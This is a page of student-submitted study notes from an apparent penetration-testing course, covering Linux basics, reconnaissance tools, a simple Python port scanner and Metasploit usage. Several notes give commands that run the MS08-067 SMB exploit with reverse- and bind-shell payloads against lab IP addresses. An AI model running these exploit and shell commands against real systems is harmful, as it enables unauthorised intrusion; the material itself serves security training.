Advanced Penetration Testing Notes

this vid

ifconfig gets address from dhcp server [view]

By: weeddogg | Related Lesson: Linux (part 5) IP Addressing and netcat | Modified: September 3, 2017

this video

cut -d -f [view]

By: weeddogg | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: September 3, 2017

msfcli

msfcli exploit/windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.76 LHOST=192.168.1.77 E msfcli has been depreciated , instead we can use ./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOA [view]

By: 574r570rm | Related Lesson: Metasploit (part 5) msfcli | Modified: September 3, 2017

File Permissions,chmod 0 7

ls -l = permissions under the listing command R = read W= Write X = execute D= directory 3 sets of 3 permissions for each file and directory. 0-7  0-nopermission 1-execute 2-write 3-read&execute 4-read 5-read&execute 6-read&write 7-full [view]

By: lokust1234 | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: September 3, 2017

auxiliary mod

use auxiliary/scanner/smb/pipe_auditorset RHOSTS 192.168.1.76exploit [view]

By: 574r570rm | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: September 3, 2017

information gathering

fierce -dns URL —> use for information gathering  theharvester: help to find all the listed domain by perticular company Netcraft : also help for information gathering  maltego: help in information gathering Shodan: you can use this for in [view]

By: dhaval317 | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: September 2, 2017

metasploit initial commands

msfupdateservice postgresql startservice metasploit startmsfconsolesearch ms08-067info <searched module path>use <exploit path>optionsset RHOST 192.168.1.76show targetsshow payloadsset payload windows/shell/bind_tcpset LPORT 1234exploitct [view]

By: 574r570rm | Related Lesson: Metasploit (part 3) Operation | Modified: September 2, 2017

port scanning python

#!/usr/bin/pythonimport socketip = raw_input(”Enter the IP Address: ”)port = input(”Enter the Port Number: ”)sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)if sock.connect_ex((ip,port)):        print ”Por [view]

By: 574r570rm | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: August 31, 2017

Notes

Add user: adduser user_name and follow the wizard adduser user_name sudo ”Add the user to sudo group”     [view]

By: hyusuf | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: August 30, 2017

Compile from nano

chmod +x python.py #call program ./python.py [view]

By: Encrypter | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: August 30, 2017

« First ‹ Previous 1 86 94 95 96 97 98 106 196 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel